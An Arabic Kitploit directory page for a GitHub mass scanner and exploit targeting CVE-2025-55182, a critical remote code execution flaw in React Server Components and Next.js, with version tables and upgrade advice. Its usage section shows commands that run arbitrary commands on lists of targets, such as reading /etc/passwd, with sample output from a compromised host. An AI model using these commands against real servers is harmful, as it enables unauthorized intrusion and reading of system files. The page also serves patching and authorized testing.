Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Scanner — ماسح آلي لـ CVE-2025-55182: ثغرة RCE حرجة في مكونات خادم React و Next.js. | Kitploit
أدوات/GitHubGitHub/qixinlee/cve-2025-55182-scanner
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

ماسح آلي لـ CVE-2025-55182: ثغرة RCE حرجة في مكونات خادم React و Next.js.

عرض المستودع
17منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 ماسح RCE

أداة فحص وتحقق جماعي لثغرة تنفيذ الأوامر عن بعد CVE-2025-55182 (React2Shell).

⚠️ ثغرة خطيرة بـ CVSS 10.0 | تؤثر على مكونات React Server وإصدارات Next.js 15.x/16.x | للاستخدام في اختبارات الأمان المصرح بها فقط

نظرة عامة على الثغرة

CVE-2025-55182 (المعروفة أيضًا باسم "React2Shell") هي ثغرة تنفيذ أوامر عن بعد (RCE) غير مصادق عليها بدرجة CVSS 10.0 (قصوى).

تنشأ الثغرة عن عدم أمان في إلغاء تسلسل (deserialization) حزمة react-server من مكونات React Server (RSC) عند معالجة بروتوكول RSC "Flight". يمكن للمهاجم إرسال طلبات HTTP مصممة خصيصًا لتنفيذ كود عشوائي على الخادم المصاب.

نظرًا لاستخدام Next.js لبروتوكول RSC "Flight"، فحتى التطبيقات التي تم إنشاؤها باستخدام create-next-app بالإعدادات الافتراضية يمكن استغلالها دون حاجة المطور لكتابة أي كود إضافي. منذ 5 ديسمبر 2025، تم رصد استغلال نشط لهذه الثغرة.

الإصدارات المتأثرة

إصدارات React Server Components المتأثرة:

الحزمةالإصدارات المتأثرة
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

إصدارات Next.js المتأثرة (باستخدام App Router):

الإصدار الرئيسينطاق الإصدارات المتأثرةالإصدار المُصلَح
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-

أطر/أدوات RSC أخرى قد تتأثر:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (وضع RSC)

إجراءات التخفيف المؤقتة

⚠️ ملاحظة مهمة: لا توجد إجراءات تخفيف مؤقتة معروفة لهذه الثغرة؛ الترقية إلى الإصدار الآمن هي الحل الوحيد.

الإصدارات الموصى بالترقية إليها:

  • React: الترقية إلى 19.0.1 أو 19.1.2 أو 19.2.1
  • Next.js: الترقية إلى 16.0.7 أو 15.5.7 أو 15.4.8 أو 15.3.6

يمكن استخدام حزمة npm الرسمية fix-react2shell-next للمساعدة في تحديث تطبيقات Next.js المتأثرة.

تثبيت التبعيات

pip install requests

طريقة الاستخدام

الاستخدام الأساسي

# 批量扫描 (从urls.txt读取目标)
python CVE-2025-55182.py -f urls.txt

# 单目标测试
python CVE-2025-55182.py -u http://192.168.1.100:3000

أوامر مخصصة

# 执行 whoami 命令
python CVE-2025-55182.py -f urls.txt -c "whoami"

# 执行 hostname 命令
python CVE-2025-55182.py -u http://target.com -c "hostname"

# 读取文件
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

خيارات متقدمة

# 指定线程数和超时时间
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# 自定义输出文件
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# 静默模式 (只输出漏洞URL)
python CVE-2025-55182.py -f urls.txt -q

شرح المعلمات

المعلمةالوصفالقيمة الافتراضية
-f, --fileملف قائمة عناوين URLurls.txt
-u, --urlعنوان URL واحد-
-t, --threadsعدد الخيوط المتزامنة20
--timeoutمهلة الطلب (ثوان)10
-o, --outputملف CSV للإخراجresults.csv
-c, --commandالأمر المنفذid
-q, --quietوضع الصامتfalse

تنسيق ملف URL

كل سطر يحتوي على عنوان URL واحد، مثال:

http://192.168.1.10:3000
http://192.168.1.11:3000

مثال على الإخراج

    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

ملف الإخراج

يتم حفظ نتائج المسح بتنسيق CSV، وتشمل الحقول التالية:

  • url - عنوان URL الهدف
  • status - رمز حالة HTTP
  • vulnerable - هل توجد ثغرة
  • output - مخرجات تنفيذ الأمر
  • error - رسالة الخطأ

إخلاء مسؤولية

هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها، ولا تستخدم لأغراض غير قانونية. يتحمل المستخدم المسؤولية ذات الصلة.

تنزيل الأداة